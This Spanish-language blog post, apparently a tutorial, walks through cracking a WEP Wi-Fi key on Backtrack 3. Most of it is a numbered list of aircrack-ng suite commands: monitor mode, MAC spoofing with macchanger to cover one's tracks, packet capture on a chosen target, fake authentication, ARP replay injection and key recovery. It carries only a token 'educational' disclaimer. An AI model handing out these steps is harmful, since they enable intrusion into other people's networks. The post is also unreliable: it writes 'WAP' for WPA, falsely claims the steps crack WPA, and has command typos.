- Sistema operativo Backtrack 3
- Tarjeta inalámbrica :P
Introducción
Primero que nada, este tutorial pretender ser educativo lo que el usuario haga aprendiendo de aquí, es su responsabilidad.
¿Para que queremos crackear una contraseña? Eso no importa, esto es meramente educativo y un reto para algunos.
También es para demostrar lo frágil que es la seguridad de nuestros proveedores de Internet y antes que nada hay que saber que tan "seguro" es la encriptación WEP.
Segun Wikipedia
Es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits o de 128 bits.
Y como dato curioso también nos dice Wikipedia, que este sistema de seguridad se "dejo de utilizar " en el 2003 y fue reemplazado por WAP.
Pero hoy en día se sigue utilizando la encriptación por WEP, siendo la mas utilizada todavía.
Empecemos
Ya que sabemos que es WEP, falta conocer que es Backtrack.
Es un sistema operativo con kernel de Linux que es utilizado exclusivamente para hacer test de seguridad no es necesario instalarlo ya que es un LiveCD. Lo pueden conseguir aquí: Backtrack (va en la versión 4)
Con estas instrucciones podemos crackear las WEP y WAP
Instrucciones:
- Abrimos la consola, aparece en la barra principal como una pantallita negra que me recuerda a la consola de comandos de Windows.
- Lo primero que debemos saber es que tipo de interface es nuestra tarjeta inalámbrica por lo que pondremos el comando airmon-ng
- Ahora aparecerá al final algo como eth1 o wlan0 o algo parecido esa es la interfac.
- Incluimos el cádigo arimon-ng stop (interface)
- Pondremos ifconfig (interface) down
- Como todo buen hacker informático, debemos cuidar la seguridad y cambiaremos la mac usando macchanger --mac00:11:22:33:44:55 (interface)
- Aparecera un lindo mensaje que te hara sentir hacker bien, y ahora activamos nuestra tarjeta usando el comando airmon-ng start (interface)
- Ahora revisaremos todas las redes "disponibles" airodump-ng (interface)
- Ya que se muestren todas pulsamos "Ctrl+c" para detenerlo.
- Cuando sepamos cual queremos usamos el siguiente comando, llenando adecuadamente cada campo que se pide esto es muy sencillo airodump-ng -c (channel) -w ("nombre de archivo") --BSSID (BSSID) (interface)
- Ahora abrimos una nueva consola, dejamos trabajando la anterior y ponemos esto aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 (interface)
- Tenemos que esperar a que nos salga que ha salido correcto al final aparecera esto :-) (algo similar LOL)
- Cuando salga la carita pondremos aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
- Abrimos una nueva consola y para finalizar ponemos aircrack-ng -b (BSSID) ("nombre del archivo"-01.cap)
- Y hemos finalizado solo es cuestión de que el programa crackee la contraseña.
Vía | Internet-END
0 comentarios:
Publicar un comentario
Si no tienes pagina web, elige la opción de Nombre/URL y escribe tu NOMBRE dejando el espacio de URL en blanco: